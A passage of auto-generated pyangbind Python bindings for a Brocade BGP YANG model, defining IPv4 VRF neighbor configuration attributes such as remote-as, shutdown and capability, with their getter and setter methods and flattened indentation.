self.__activate = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__shutdown = YANGDynClass(base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__ebgp_btsh = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__enable_peer_as_check = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__af_ipv4_neighbor_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)
self.__route_reflector_client = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__unsuppress_map = YANGDynClass(base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__remove_private_as = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__as_override = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__associate_peer_group = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)
self.__soft_reconfiguration = YANGDynClass(base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__remote_as = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)
self.__maxas_limit = YANGDynClass(base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__ebgp_multihop = YANGDynClass(base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__allowas_in = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)
self.__additional_paths = YANGDynClass(base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__maximum_prefix = YANGDynClass(base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__update_source = YANGDynClass(base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__prefix_list = YANGDynClass(base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__neighbor_route_map = YANGDynClass(base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__static_network_edge = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__description = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..220']}), is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor by description', u'cli-multi-value': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='neighbor-description', is_config=True)
self.__local_as = YANGDynClass(base=local_as.local_as, is_container='container', presence=False, yang_name="local-as", rest_name="local-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Assign local-as number to neighbor', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-break-sequence-commands': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__advertisement_interval = YANGDynClass(base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__af_nei_weight = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)
self.__next_hop_self = YANGDynClass(base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__password = YANGDynClass(base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)
self.__enforce_first_as = YANGDynClass(base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__filter_list = YANGDynClass(base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__send_community = YANGDynClass(base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__timers = YANGDynClass(base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__af_vrf_neighbor_capability = YANGDynClass(base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'router', u'router-bgp', u'address-family', u'ipv4', u'ipv4-unicast', u'af-vrf', u'neighbor', u'af-ipv4-vrf-neighbor-address-holder', u'af-ipv4-neighbor-addr']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'bgp', u'address-family', u'ipv4', u'unicast', u'vrf', u'neighbor', u'af-ipv4-neighbor-addr']
def _get_af_ipv4_neighbor_address(self):
"""
Getter method for af_ipv4_neighbor_address, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_ipv4_neighbor_address (inet:ipv4-address)
"""
return self.__af_ipv4_neighbor_address
def _set_af_ipv4_neighbor_address(self, v, load=False):
"""
Setter method for af_ipv4_neighbor_address, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_ipv4_neighbor_address (inet:ipv4-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_af_ipv4_neighbor_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_af_ipv4_neighbor_address() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """af_ipv4_neighbor_address must be of a type compatible with inet:ipv4-address""",
'defined-type': "inet:ipv4-address",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)""",
})
self.__af_ipv4_neighbor_address = t
if hasattr(self, '_set'):
self._set()
def _unset_af_ipv4_neighbor_address(self):
self.__af_ipv4_neighbor_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)
def _get_remote_as(self):
"""
Getter method for remote_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remote_as (bgp-remote-as)
"""
return self.__remote_as
def _set_remote_as(self, v, load=False):
"""
Setter method for remote_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remote_as (bgp-remote-as)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remote_as must be of a type compatible with bgp-remote-as""",
'defined-type': "brocade-bgp:bgp-remote-as",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)""",
})
self.__remote_as = t
if hasattr(self, '_set'):
self._set()
def _unset_remote_as(self):
self.__remote_as = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5]))\\.(([0-9][0-9]{0,3})|([1-5][0-9]{4})|(6[0-4][0-9]{3})|(65[0-4][0-9]{2})|(655[0-2][0-9])|(6553[0-5])))|([1-9][0-9]{0,8})|([1-3][0-9]{9})|(4[0-1][0-9]{8})|(42[0-8][0-9]{7})|(429[0-3][0-9]{6})|(4294[0-8][0-9]{5})|(42949[0-5][0-9]{4})|(429496[0-6][0-9]{3})|(4294967[0-1][0-9]{2})|(42949672[0-8][0-9])|(429496729[0-5])'}), is_leaf=True, yang_name="remote-as", rest_name="remote-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify a BGP neighbor'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-remote-as', is_config=True)
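  # The remote-as pattern above accepts either asplain AS numbers (1..4294967295)
  # or asdot notation (two 0..65535 halves separated by a dot). A minimal sketch,
  # with `nbr` standing in for a hypothetical instance of this class:
  #
  #     nbr._set_remote_as('65001')      # asplain
  #     nbr._set_remote_as('64512.10')   # asdot, also matches the pattern
  #     nbr._unset_remote_as()           # back to the unset default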
def _get_shutdown(self):
"""
Getter method for shutdown, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/shutdown (container)
"""
return self.__shutdown
def _set_shutdown(self, v, load=False):
"""
Setter method for shutdown, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/shutdown (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_shutdown is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shutdown() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """shutdown must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__shutdown = t
if hasattr(self, '_set'):
self._set()
def _unset_shutdown(self):
self.__shutdown = YANGDynClass(base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_af_vrf_neighbor_capability(self):
"""
Getter method for af_vrf_neighbor_capability, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_vrf_neighbor_capability (container)
"""
return self.__af_vrf_neighbor_capability
def _set_af_vrf_neighbor_capability(self, v, load=False):
"""
Setter method for af_vrf_neighbor_capability, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_vrf_neighbor_capability (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_af_vrf_neighbor_capability is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_af_vrf_neighbor_capability() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """af_vrf_neighbor_capability must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__af_vrf_neighbor_capability = t
if hasattr(self, '_set'):
self._set()
def _unset_af_vrf_neighbor_capability(self):
self.__af_vrf_neighbor_capability = YANGDynClass(base=af_vrf_neighbor_capability.af_vrf_neighbor_capability, is_container='container', presence=False, yang_name="af-vrf-neighbor-capability", rest_name="capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Advertise capability to the peer', u'alt-name': u'capability', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_allowas_in(self):
"""
Getter method for allowas_in, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/allowas_in (uint32)
"""
